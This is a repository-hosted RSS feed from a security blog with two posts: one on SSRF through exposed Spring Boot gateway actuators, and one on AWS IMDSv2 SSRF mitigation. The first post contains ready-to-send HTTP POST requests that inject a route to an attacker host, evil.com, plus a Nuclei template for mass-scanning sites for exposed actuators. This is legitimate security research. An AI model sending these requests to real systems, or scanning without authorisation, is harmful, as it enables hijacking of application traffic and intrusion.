-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathindex.xml
More file actions
180 lines (160 loc) · 10.6 KB
/
index.xml
File metadata and controls
180 lines (160 loc) · 10.6 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
<channel>
<title>Welcome</title>
<link>https://si9int.sh/</link>
<description>Recent content on Welcome</description>
<generator>Hugo -- gohugo.io</generator>
<language>en-us</language>
<lastBuildDate>Sat, 01 Jan 2022 02:01:58 +0530</lastBuildDate>
<atom:link href="https://si9int.sh/index.xml" rel="self" type="application/rss+xml" />
<item>
<title>"Spring Boot"-Actuators and SSRF</title>
<link>https://si9int.sh/posts/spring-boot-ssrf/</link>
<pubDate>Sat, 01 Jan 2022 02:01:58 +0530</pubDate>
<guid>https://si9int.sh/posts/spring-boot-ssrf/</guid>
<description>Welcome https://si9int.sh/posts/spring-boot-ssrf/ -<h2 id="1-intro">1. Intro</h2>
<p>A respective colleague of mine Wyatt Dahlenburg recently described in a blog article how a mis-configured &ldquo;Spring Boot&rdquo; application can be used to create an opportunity for SSRF (Server Side Request Forgery) attacks.</p>
<p>The &ldquo;Spring Framework&rdquo; is an application framework designed for the Java development platform and commonly used to develop web applications like REST-APIs. The &ldquo;Spring Boot&rdquo; extension provides a &ldquo;ready to run&rdquo; environment which allows creating (standalone) Spring-based applications. These standalone applications can be extended through a module called <code>spring-boot-actuator</code> to append so called &ldquo;production-ready features&rdquo; via actuators. &ldquo;Actuators&rdquo; are basically providing administrative functionality for controlling the application flow (e.g. downstream) or monitoring specific functional behavior of the application itself.</p>
<p>An example for a &ldquo;Spring Boot&rdquo; actuator would be the <code>/actuator/health</code> endpoint which returns <code>UP</code> if everything runs as intended. Each of these individual endpoints can be enabled or disabled and exposed over HTTP or JMX (Java Management Extensions; an infrastructure for managing Java applications locally or remotely). Some of these endpoints are exposed by default (e.g. the above described <code>health</code>-actuator), a possibility which can be used by an attacker to produce information disclosure. Since v.2+ &ldquo;Spring Boot&rdquo; discloses enabled actuators when visiting the endpoint <code>/actuator</code>.</p>
<hr>
<h2 id="2-the-gateway-actuator">2. The <code>gateway</code>-Actuator</h2>
<p>In his blog Wyatt Dahlenburg described how he stumbled across an enabled <code>gateway</code>-actuator which allows viewing configured routes of the application if extended with <code>/routes</code> (<code>/actuator/gateway/routes</code>; a direct request results in a HTTP-response of status-code 404).</p>
<p>Routes allow developers to define conditions how application traffic can be proxied using the gateway application (in this case the &ldquo;Spring Boot&rdquo; application) to downstream applications. These routes can be resolved by different protocols using different URI schemes such as <code>http://</code>, <code>https://</code>, <code>ws://</code> (Web-Socket), <code>wss://</code> (Web-Socket over HTTPS) and <code>lb://</code> (Load Balancer). According to the documentation:</p>
<table>
<thead>
<tr>
<th>ID</th>
<th>HTTP-Method</th>
<th>Description</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>globalfilters</code></td>
<td>GET</td>
<td>Displays the list of global filters applied to the routes.</td>
</tr>
<tr>
<td><code>routefilters</code></td>
<td>GET</td>
<td>Displays the list of <code>GatewayFilter</code> factories applied to a particular route.</td>
</tr>
<tr>
<td><code>refresh</code></td>
<td>POST</td>
<td>Clears the routes cache.</td>
</tr>
<tr>
<td><code>routes</code></td>
<td>GET</td>
<td>Displays the list of routes defined in the gateway.</td>
</tr>
<tr>
<td><code>routes/{id}</code></td>
<td>GET</td>
<td>Displays information about a particular route.</td>
</tr>
<tr>
<td><code>routes/{id}</code></td>
<td>POST</td>
<td>Adds a new route to the gateway.</td>
</tr>
<tr>
<td><code>routes/{id}</code></td>
<td>DELETE</td>
<td>Removes an existing route from the gateway.</td>
</tr>
</tbody>
</table>
<p>Here comes the opportunity of creating a SSRF into play. By sending a HTTP-POST request to the unprotected actuator it is possible to define a new route with the ID &ldquo;new_route&rdquo; which proxify traffic from <code>/new-route</code> to an attacker-controlled domain called <code>evil.com</code> over the HTTP-protocol:</p>
<pre><code>POST /actuator/gateway/routes/new_route HTTP/1.1
Host: 127.0.0.1:80
Connection: close
Content-Type: application/json
{
&quot;predicates&quot;: [
{
&quot;name&quot;: &quot;Path&quot;,
&quot;args&quot;: {
&quot;_genkey_0&quot;: &quot;/new_route/**&quot;
}
}
],
&quot;filters&quot;: [
{
&quot;name&quot;: &quot;RewritePath&quot;,
&quot;args&quot;: {
&quot;_genkey_0&quot;: &quot;/new_route(?&lt;path&gt;.*)&quot;,
&quot;_genkey_1&quot;: &quot;/${path}&quot;
}
}
],
&quot;uri&quot;: &quot;https://evil.com&quot;,
&quot;order&quot;: 0
}
</code></pre><p>A second HTTP-Post request refreshes the gateway and enables the evil route.</p>
<pre><code>POST /actuator/gateway/refresh HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/json
Connection: close
Content-Length: 230
{
&quot;predicate&quot;: &quot;Paths: [/new_route], match trailing slash: true&quot;,
&quot;route_id&quot;: &quot;new_route&quot;,
&quot;filters&quot;: [
&quot;[[RewritePath /new_route(?&lt;path&gt;.*) = /${path}], order = 1]&quot;
],
&quot;uri&quot;: &quot;https://evil.com&quot;,
&quot;order&quot;: 0
}
</code></pre><p>It should be noticed that actuators are only stored in memory. If an administrator detects such behavior an application-restart will be enough to make modifications of the <code>gateway</code>-actuator vanish.</p>
<hr>
<h2 id="3-mass-detection">3. Mass-Detection</h2>
<p>The idea of catching low-hanging fruits through mis-configured &ldquo;Spring Boot&rdquo; actuators led me into the creation of a &ldquo;Nuclei&rdquo;-template:</p>
<pre><code>id: spring-boot-actuator
info:
name: Spring Boot Actuator
description: Detects if a host is deployed via Spring Boot and is using publicly accessible actuators
author: SI9INT
requests:
- method: GET
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Origin: https://google.de
path:
- &quot;{{BaseURL}}/actuator&quot;
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- &quot;templated&quot;
</code></pre><p>Running Nuclei against a German subset of the &ldquo;Majestic Million&rdquo; (<a href="https://majestic.com/reports/majestic-million">https://majestic.com/reports/majestic-million</a>) led to few but interesting results.</p>
<hr>
<p>Sources:</p>
<ul>
<li><a href="https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/">https://wya.pl/2021/12/20/bring-your-own-ssrf-the-gateway-actuator/</a></li>
<li><a href="https://www.baeldung.com/java-management-extensions">https://www.baeldung.com/java-management-extensions</a></li>
<li><a href="https://de.wikipedia.org/wiki/Spring_(Framework)">https://de.wikipedia.org/wiki/Spring_(Framework)</a></li>
<li><a href="https://spring.io/projects/spring-boot#overview">https://spring.io/projects/spring-boot#overview</a></li>
<li><a href="https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html">https://docs.spring.io/spring-boot/docs/current/reference/html/actuator.html</a></li>
</ul>
- https://si9int.sh/posts/spring-boot-ssrf/ - </description>
</item>
<item>
<title>AWS Tackling Server Side Request Forgery</title>
<link>https://si9int.sh/posts/aws-tackling-ssrf/</link>
<pubDate>Wed, 15 Dec 2021 02:01:58 +0530</pubDate>
<guid>https://si9int.sh/posts/aws-tackling-ssrf/</guid>
<description>Welcome https://si9int.sh/posts/aws-tackling-ssrf/ -<p>New Amazon EC2 (Amazon Elastic Compute Cloud) instances are capable of defending exploitation attempts using common GET-based SSRF (Server Side Request Forgery) vulnerabilities. The IMDSv2 (Instance Metadata Service Version 2) now mitigates such endeavour by restricting the metadata service using conditional authentication:</p>
<ol>
<li>A HTTP-PUT request to <code>169.254.169.254/latest/api/token</code> needs to be made for generating a token using a custom HTTP-header <code>x-aws-ec2-metadata-token-ttl-seconds</code> which holds the number of seconds the requested token is valid for.</li>
<li>The requested token needs to be delivered via a new custom HTTP-header called <code>x-aws-ec2-metadata-token</code> when interacting with the Instance Metadata Service.</li>
</ol>
<p>This will successfully eliminate GET-based SSRF in AWS environments.</p>
- https://si9int.sh/posts/aws-tackling-ssrf/ - </description>
</item>
</channel>
</rss>